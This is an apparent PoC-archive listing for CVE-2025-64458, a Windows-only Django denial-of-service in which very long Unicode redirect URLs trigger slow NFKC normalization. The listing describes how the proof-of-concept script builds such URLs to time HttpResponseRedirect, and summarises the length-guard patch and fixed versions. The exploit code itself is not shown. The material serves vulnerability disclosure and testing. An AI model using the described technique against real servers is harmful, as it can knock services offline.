Associated Vulnerability
Title:Django 安全漏洞 (CVE-2025-64458)Description:Django是Django基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 Django 5.1版本至5.1.14之前版本、4.2版本至4.2.26之前版本和5.2版本至5.2.8之前版本存在安全漏洞,该漏洞源于Windows上的NFKC规范化处理速度较慢,可能导致拒绝服务攻击。
Description
A PoC script for demonstrating CVE 2025-64458, found in Django, potential DoS in `HttpResponseRedirect`/`HttpResponsePermanentRedirect` on Windows.
Readme
# CVE-2025-64458 — Django Redirect DoS on Windows
## Description
A denial-of-service (DoS) issue in Django’s redirect responses allows an attacker to trigger excessive CPU work during URL normalization when constructing redirect responses. On Windows, Python’s Unicode NFKC normalization is particularly slow. As a result, creating `HttpResponseRedirect`/`HttpResponsePermanentRedirect` (or using `django.shortcuts.redirect()`) with attacker‑controlled, very large Unicode URLs can cause pathological processing times, leading to request thread exhaustion and service slowdown/outage.
This issue is a follow‑up to CVE‑2025‑27556 and specifically impacts Windows due to the performance characteristics of `unicodedata.normalize()` on that platform.
## Impact
- Unauthenticated DoS via endpoints that reflect or use user‑supplied redirect targets (e.g., `next`/`return_to` parameters, or app logic returning a redirect using untrusted input).
- Affects Django’s redirect classes: `HttpResponseRedirect` (302) and `HttpResponsePermanentRedirect` (301), as well as `django.shortcuts.redirect()`.
- Severity: High (as noted in Django’s release notes). Linux/macOS are far less impacted; Windows shows significant slowdowns.
## What the PoC (`poc.py`) Demonstrates
- Builds extremely long URLs by repeating a full‑width Unicode letter in the hostname (e.g., `A`), e.g., `https://AA…/`.
- Repeatedly instantiates `HttpResponseRedirect(url)`, which triggers URL normalization (`iri_to_uri()`) and splitting (`urlsplit()`), exercising the slow path on Windows.
- Prints average time per instantiation across increasing URL sizes, showing how computation time grows with very large Unicode inputs.
- On patched Django, overly long redirect targets are rejected early with `DisallowedRedirect` (see Patch Summary), preventing the expensive normalization work.
## Patch Summary (c880530ddd4f)
- Adds a length guard to redirect targets in `HttpResponseRedirectBase.__init__`:
- Imports `MAX_URL_LENGTH` from `django.utils.http`.
- Converts the target to `str` and raises `DisallowedRedirect` if `len(redirect_to_str) > MAX_URL_LENGTH` before calling `urlsplit()`.
- Extends tests to ensure excessively long Unicode URLs raise `DisallowedRedirect`.
- Documents the CVE in the 4.2.26, 5.1.14, and 5.2.8 release notes as a Windows‑specific DoS risk due to slow NFKC normalization.
## Affected/Fixed Versions
- Fixed in: 4.2.26, 5.1.14, 5.2.8.
- Older patch levels are vulnerable on Windows when redirect targets derive from untrusted input.
## Reference
- Upstream patch diff: https://github.com/django/django/commit/c880530ddd4fabd5939bab0e148bebe36699432a.diff
File Snapshot
[4.0K] /data/pocs/9d6296f9958f996449f3428dfc0fc128cd211f14
├── [1.3K] poc.py
├── [2.6K] README.md
└── [ 46] requirements.txt
1 directory, 3 files
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.